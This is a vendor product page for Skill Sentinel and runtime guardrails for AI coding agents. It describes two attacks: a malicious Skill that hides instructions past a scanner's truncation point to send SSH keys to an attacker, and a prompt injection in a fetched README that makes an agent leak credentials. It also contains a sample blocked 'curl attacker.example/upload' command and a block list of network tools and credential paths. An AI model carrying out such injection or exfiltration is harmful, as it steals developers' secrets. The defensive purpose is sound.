Let your team vibe code -
without losing control

AI coding agents are powerful. But they execute Skills with no security review and run commands with no policy enforcement. Enkrypt AI gives you both layers: scan before execution, govern during it.

Works with

Cursor
Claude Code
Kiro
CrewAI
LangGraph
OpenAI SDK
Vercel AI

Security gaps at every stage of execution

Scanning catches threats before they run. Guardrails catch behavior that shouldn't run - even from Skills that look clean. You need both.

Supply Chain · Layer 1
Skills are executable code - not just documentation
When a developer clones a repo with a .cursor/skills/ or .claude/skills/ directory, they're installing behavior that controls what their AI agent does. A malicious Skill can silently steal credentials before anyone notices.
No install dialog, no security warning, no permission prompt
Malicious instructions buried deep in markdown files - past where scanners stop reading
Auto-activation means "clean up this code" can trigger credential exfiltration
Existing scanners truncate files and miss attacks beyond ~3,000 characters
Runtime Behavior · Layer 2
Agents act autonomously - and you have no visibility into what they're doing
Even a perfectly clean Skill can be misused at runtime. Without hooks into the agent's execution path, you have no visibility into what commands it runs, what files it reads, or what data leaves your environment.
Coding agents can read ~/.ssh/, .env, and cloud credentials without warning
Multi-step tool chains can exfiltrate data through seemingly innocent sequences
No audit trail: you can't reconstruct what the agent did or why
Novel attacks at runtime won't be caught by pre-execution scanning alone

Real attacks - demonstrated by Enkrypt AI

Each attack requires a different layer to catch it. Scanning alone or runtime governance alone leaves you exposed.

Skill Sentinel catches this
Supply Chain Attack
1
Developer clones a repo
Repo contains a ".cursor/skills/code-cleanup" directory
2
Opens the project in Cursor
Asks the agent to "clean up this code" - a routine request
3
Agent auto-activates the Skill
The malicious SKILL.md is read in full - including hidden instructions beyond character 3,000
4
SSH key exfiltrated silently
Hidden instruction runs a script that reads ~/.ssh/id_rsa and POSTs it to an attacker endpoint
Guardrails catch this
Runtime Misuse Attack
1
Developer uses a legitimate Skill
A clean, well-reviewed Skill for "deploying a staging build"
2
Agent reads environment variables
The Skill legitimately needs AWS_ACCESS_KEY_ID - agent reads the .env file
3
Context hijack mid-session
A prompt injection in a fetched README redirects agent behavior mid-task
4
Credentials sent to model output
Agent includes raw credentials in its response - no scan would have caught this

Scan the supply chain. Govern the runtime.

Scanning catches threats before they execute. Guardrails enforce policy while agents are running. You need both.

Layer 1 - Supply Chain
Skill Sentinel
Open-source scanner that treats Skills as the security-critical supply chain components they are. No truncation. Multi-agent analysis. Malware detection built in.
Full-file analysis - no truncation limits that attackers can exploit
Multi-agent pipeline: manifest inspection, file verification, cross-referencing, threat correlation
VirusTotal integration for binary and archive scanning
Cross-file threat correlation - catches multi-file attacks
Parallel bulk scanning of all Cursor, Claude Code, Codex, and OpenClaw Skills
OWASP LLM Top 10 + Agentic Top 10 threat mapping
Layer 2 - Runtime
Guardrails for Coding Agents
Hook into your coding agent's execution path and enforce policy in real time - what data it can access, which commands it can run, and what leaves your environment.
Visibility into what coding agents actually do - commands, file access, network calls
Policy-based enforcement: block credential access, restrict shell commands, redact secrets
Every decision stamped with policy_id + reason_code for audit trails
Command allowlisting - permit read-only operations, block network and install by default
Approval gates for sensitive operations (deployments, credential access, infra changes)
Export enforcement events to SIEM and ticketing systems
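As an illustrative sketch of what an exported enforcement event could contain - field names and values here are assumptions for illustration, not the product's actual schema - each decision carries its policy_id and reason_code:

```json
{
  "event": "command_blocked",
  "command": "curl https://attacker.example/upload",
  "policy_id": "pol-cmd-net-001",
  "reason_code": "NETWORK_EGRESS_BLOCKED",
  "agent": "cursor",
  "timestamp": "2025-01-15T10:32:04Z"
}
```

Stamping every decision with a stable policy identifier is what makes the audit trail reconstructable: you can trace any blocked command back to the exact policy that fired.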

What Skill Sentinel and Guardrails catch

Mapped to OWASP Top 10 for LLM Applications and OWASP Top 10 for Agentic Applications.

Sentinel
Prompt injection in Skills
Override attempts, mode changes, policy bypass instructions hidden in SKILL.md files
Data exfiltration directives
Network calls designed to steal credentials, SSH keys, API tokens, or source code
Obfuscated payloads
Base64 + exec, hex-encoded payloads, and unreadable code designed to evade review
Hardcoded secrets
Embedded API keys, passwords, and private keys in Skill files and scripts
Malware in binaries
Executables, archives, and PDFs scanned against VirusTotal's database
Transitive trust abuse
Delegation to untrusted external sources, cross-context bridging between files

Guardrails
Unauthorized command execution
Block dangerous shell commands, package installs, and system modifications at runtime
Credential access
Prevent reading SSH keys, env files, cloud credentials, and API tokens without approval
Secret leakage in output
Redact sensitive data before it's sent to the model or logged in agent output
Network exfiltration
Block or alert on outbound network calls from coding agents to unknown endpoints

Combined
Tool chaining abuse
Multi-step workflows that read sensitive data and then transmit it - caught in scan and at runtime
Autonomy abuse
Skills or actions that exceed intended scope - auto-deploying, modifying infra, or escalating privileges

From clone to governed in four steps

Skill Sentinel scans before execution. Guardrails enforce during execution. Both produce evidence.

1) Scan Skills

Run Skill Sentinel on .cursor/skills/ and .claude/skills/ - in CI or locally

2) Review & approve

Triage findings, block malicious Skills, approve safe ones into your allowlist

3) Hook guardrails

Integrate runtime enforcement - command allowlists, data policies, approval gates

4) Monitor & export

Every enforcement decision logged with policy_id - export to SIEM or audit packet

Running in minutes, not sprints

Skill Sentinel is open source and installs with pip. Guardrails integrate via hooks or proxy.

Skill Sentinel
Scan your Skills
# Install
pip install skill-sentinel

# Scan a single Skill
skill-sentinel scan --skill ./my-skill

# Scan all Cursor skills in parallel
skill-sentinel scan cursor --parallel

# Auto-discover and scan everything
skill-sentinel scan

# CI/CD integration
skill-sentinel scan --dir .cursor/skills/
skill-sentinel scan --dir .claude/skills/
Guardrails
Enforce at runtime
# Hook into your coding agent
# via API wrapper, proxy, or SDK

# Define a policy pack
policy:
  block_commands: [curl, wget, nc, ssh, "pip install", "npm install"]
  block_file_access: ["~/.ssh/*", "~/.aws/*", ".env", "*.pem", "*.key"]
  require_approval: [deploy, publish, push, "rm -rf", chmod, chown]

# Every decision → policy_id + trace

Works with the coding agents your team already uses

Skill Sentinel scans Skills from any provider. Guardrails hook into any agent's execution path.

Frequently Asked Questions

How is Skill Sentinel different from Cisco's AI Skill Scanner?
Cisco's scanner truncates files at ~3,000 characters for markdown and ~1,500 for code - our demonstrated attack bypassed it entirely by placing malicious instructions beyond these limits. Skill Sentinel reads complete files with no truncation, uses a multi-agent analysis pipeline, includes VirusTotal malware scanning, and performs cross-file threat correlation to catch sophisticated multi-file attacks.
Is Skill Sentinel open source?
Yes. Skill Sentinel is fully open source on GitHub. Install with pip, export your API key, and start scanning. The free tier of VirusTotal provides 500 lookups per day for malware detection.
Why do I need Guardrails if I'm already scanning Skills?
Scanning catches known threats before execution - but it can't prevent a legitimate Skill from being misused at runtime, or catch novel attacks it hasn't seen before. Guardrails enforce policy during execution: blocking credential access, restricting commands, redacting secrets, and requiring approval for sensitive operations. Defense in depth means you need both layers.
Can I integrate Skill Sentinel into CI/CD?
Yes. Run skill-sentinel scan --dir .cursor/skills/ as a CI step. It produces JSON reports with severity levels, evidence, and remediation recommendations. Gate your pipeline on the results - block merges that introduce malicious or suspicious Skills.
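As a minimal GitHub Actions sketch - the workflow structure is an assumption, and it assumes skill-sentinel exits non-zero when it flags malicious Skills (verify your version's exit-code behavior before relying on it as a gate):

```yaml
# .github/workflows/skill-scan.yml - illustrative sketch
name: Scan AI Skills
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: pip install skill-sentinel
      # Assumed to fail the job (and block the merge) on malicious findings
      - run: skill-sentinel scan --dir .cursor/skills/
      - run: skill-sentinel scan --dir .claude/skills/
```

Running the scan on every pull request means a malicious Skill is caught at review time, before it ever reaches a developer's machine.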
Does the Guardrails layer add latency to my coding workflow?
Guardrails are designed for low-latency enforcement. Command allowlisting and file access policies are evaluated locally in microseconds. More complex policies that involve content inspection add single-digit milliseconds. Developers won't notice the difference.
What should we do as a quick win right now?
Three immediate actions:
  • Install Skill Sentinel and scan all Skills in your repos today - it takes five minutes.
  • Disable auto-execution in your coding agents and require explicit approval for commands.
  • Add CODEOWNERS rules to require security review for changes to .cursor/ and .claude/ directories.
These three steps cover the most critical gaps while you evaluate the full Guardrails integration.
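For the CODEOWNERS step, a minimal sketch - the team handle is a placeholder for your own security reviewers:

```
# .github/CODEOWNERS - route agent-config changes to security review
/.cursor/   @your-org/security-team
/.claude/   @your-org/security-team
```

With branch protection requiring code-owner review, no change to these directories can merge without a security sign-off.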

Your developers are vibe coding right now. Are the Skills they're using safe?